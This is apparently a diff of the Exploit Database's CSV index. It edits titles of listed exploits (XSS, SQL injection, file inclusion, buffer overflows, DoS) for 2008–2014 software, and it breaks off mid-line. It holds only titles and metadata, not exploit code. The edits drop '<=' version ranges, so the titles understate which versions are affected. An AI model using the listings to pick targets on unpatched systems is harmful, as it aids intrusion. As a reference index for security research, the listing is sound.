+31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",hardware,remote,0 31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",windows,remote,30000 @@ -28785,9 +28785,9 @@ id,file,description,date,author,platform,type,port 31934,platforms/windows/dos/31934.txt,"Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption",2008-06-17,"Ivan Sanchez",windows,dos,0 31935,platforms/php/webapps/31935.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 -31937,platforms/php/local/31937.txt,"PHP <= 5.2.6 - chdir Function http URL Argument safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 +31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 31938,platforms/php/webapps/31938.txt,"KEIL Software photokorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 -31939,platforms/php/webapps/31939.txt,"vBulletin <= 3.7.1 Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 +31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - AppleScript ARDAgent Shell Local Privilege Escalation",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 @@ -28795,9 +28795,9 @@ id,file,description,date,author,platform,type,port 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 31944,platforms/php/webapps/31944.txt,"PHPAuction 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component SQL Injection",2008-06-22,His0k4,php,webapps,0 -31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Include",2008-06-22,CraCkEr,php,webapps,0 +31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 31949,platforms/php/webapps/31949.txt,"Chipmunk Blog members.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31950,platforms/php/webapps/31950.txt,"Chipmunk Blog comments.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31951,platforms/php/webapps/31951.txt,"Chipmunk Blog photos.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 @@ -28826,7 +28826,7 @@ id,file,description,date,author,platform,type,port 31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0 32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 -32095,platforms/linux/dos/32095.pl,"Asterisk <= 1.6 IAX 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 +32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote,0 31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0 31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0 @@ -28836,7 +28836,7 @@ id,file,description,date,author,platform,type,port 31980,platforms/windows/remote/31980.html,"UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote,0 31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 -32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include",2008-07-31,U238,php,webapps,0 +32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 @@ -28852,23 +28852,23 @@ id,file,description,date,author,platform,type,port 31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Command Directory Traversal",2008-06-27,"Tan Chew Keong",windows,remote,0 31998,platforms/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos,0 31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,multiple,dos,0 -32000,platforms/linux/dos/32000.txt,"OpenLDAP <= 2.3.41 BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos,0 +32000,platforms/linux/dos/32000.txt,"OpenLDAP 2.3.41 BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos,0 32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 32004,platforms/php/webapps/32004.txt,"FaName 1.0 index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple DoS",2008-06-30,"Noam Rathus",multiple,dos,0 -32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 +32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0 32010,platforms/php/webapps/32010.txt,"Joomla! and Mambo 'com_is' 1.0.1 Component Multiple SQL Injection Vulnerabilities",2008-07-02,"H-T Team",php,webapps,0 -32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Include",2008-07-07,ahmadbady,php,webapps,0 +32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter XSS",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 -32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 - 'blog.php' Local File Include",2008-07-07,Cod3rZ,php,webapps,0 -32017,platforms/php/webapps/32017.html,"VBulletin <= 3.7.1 - admincp/faq.php Injection adminlog.php XSS",2008-07-08,"Jessica Hope",php,webapps,0 +32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 +32017,platforms/php/webapps/32017.html,"VBulletin 3.7.1 - admincp/faq.php Injection adminlog.php XSS",2008-07-08,"Jessica Hope",php,webapps,0 32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 @@ -28900,12 +28900,12 @@ id,file,description,date,author,platform,type,port 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 32052,platforms/windows/remote/32052.html,"Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 -32053,platforms/php/webapps/32053.txt,"WordPress <= 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 +32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0 32055,platforms/multiple/local/32055.txt,"Netrw Vim Script 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local,0 32056,platforms/windows/dos/32056.py,"BitComet 1.02 URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos,0 -32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities",2008-07-16,ahmadbady,php,webapps,0 -32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Include",2008-07-16,"Ghost Hacker",php,webapps,0 +32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Parameter Multiple Remote File Inclusion Vulnerabilities",2008-07-16,ahmadbady,php,webapps,0 +32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",php,webapps,0 32059,platforms/php/webapps/32059.txt,"Claroline 1.8.9 announcements/announcements.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32060,platforms/php/webapps/32060.txt,"Claroline 1.8.9 calendar/agenda.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32061,platforms/php/webapps/32061.txt,"Claroline 1.8.9 course/index.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 @@ -28923,10 +28923,10 @@ id,file,description,date,author,platform,type,port 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 -32078,platforms/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Include",2008-07-17,N3TR00T3R,php,webapps,0 +32078,platforms/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,php,webapps,0 32079,platforms/php/webapps/32079.txt,"CreaCMS - edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32080,platforms/php/webapps/32080.txt,"CreaCMS - fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 -32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Include",2008-07-18,Ciph3r,php,webapps,0 +32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0 @@ -28937,7 +28937,7 @@ id,file,description,date,author,platform,type,port 32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 -32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Include",2008-07-21,Cru3l.b0y,php,webapps,0 +32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32097,platforms/php/webapps/32097.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 @@ -28959,14 +28959,14 @@ id,file,description,date,author,platform,type,port 32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'username' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 32115,platforms/php/webapps/32115.txt,"Ajax File Manager Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 -32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Include",2008-07-25,"HACKERS PAL",php,webapps,0 +32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 SQL Injection",2008-07-26,dun,php,webapps,0 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 admin_group_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 admin_category_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 -32121,platforms/php/webapps/32121.php,"Jamroom <= 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0 +32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0 -32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities",2008-07-29,"Ghost Hacker",php,webapps,0 +32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin Multiple Remote File Inclusion Vulnerabilities",2008-07-29,"Ghost Hacker",php,webapps,0 32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 - ActiveX Control Remote Buffer Overflow",2008-07-29,"Edi Strosar",windows,remote,0 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0 @@ -28975,8 +28975,8 @@ id,file,description,date,author,platform,type,port 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 -32137,platforms/multiple/remote/32137.txt,"Apache Tomcat <= 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 -32138,platforms/multiple/remote/32138.txt,"Apache Tomcat <= 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 +32137,platforms/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 +32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' Parameter SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 @@ -28988,7 +28988,7 @@ id,file,description,date,author,platform,type,port 32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0 32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 report.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0 32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 help.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0 -32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Include",2008-08-04,"Sina Yazdanmehr",php,webapps,0 +32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0 32153,platforms/qnx/local/32153.sh,"QNX 6.4.x/6.5.x ifwatchd - Local Root Exploit",2014-03-10,cenobyte,qnx,local,0 @@ -29016,14 +29016,14 @@ id,file,description,date,author,platform,type,port 32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery cleanup.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery browsecats.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps,0 -32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-08-06,casper41,php,webapps,0 +32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusion Vulnerabilities",2008-08-06,casper41,php,webapps,0 32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,"Khashayar Fereidani",php,webapps,0 32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32184,platforms/asp/webapps/32184.txt,"KAPhotoservice order.asp page Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 32185,platforms/asp/webapps/32185.txt,"KAPhotoservice search.asp filename Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 -32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Include Vulnerabilities",2008-08-06,by_casper41,php,webapps,0 +32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Inclusion Vulnerabilities",2008-08-06,by_casper41,php,webapps,0 32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 @@ -29050,18 +29050,18 @@ id,file,description,date,author,platform,type,port 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (CSRF/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file param) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 -32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 +32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x visitor/index.php sessionid Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x index.php filter Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x staff/index.php customfieldlinkid Parameter SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 -32222,platforms/multiple/dos/32222.rb,"Ruby <= 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 -32223,platforms/multiple/remote/32223.rb,"Ruby <= 1.9 dl Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 -32224,platforms/multiple/remote/32224.rb,"Ruby <= 1.9 Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 +32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 +32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 +32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote,0 -32226,platforms/php/webapps/32226.txt,"Datafeed Studio 'patch.php' Remote File Include",2008-08-12,"Bug Researchers Group",php,webapps,0 +32226,platforms/php/webapps/32226.txt,"Datafeed Studio 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 -32228,platforms/linux/remote/32228.xml,"Bugzilla <= 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",linux,remote,0 +32228,platforms/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",linux,remote,0 32229,platforms/windows/dos/32229.txt,"hMailServer 4.4.1 IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0 32230,platforms/php/webapps/32230.txt,"IDevSpot PhpLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps,0 32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 - modules.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 @@ -29075,14 +29075,14 @@ id,file,description,date,author,platform,type,port 32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",linux,remote,0 32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0 -32249,platforms/jsp/webapps/32249.txt,"Openfire <= 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 +32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 -32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Include",2008-08-15,Lostmon,php,webapps,0 +32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 32252,platforms/php/webapps/32252.txt,"Mambo 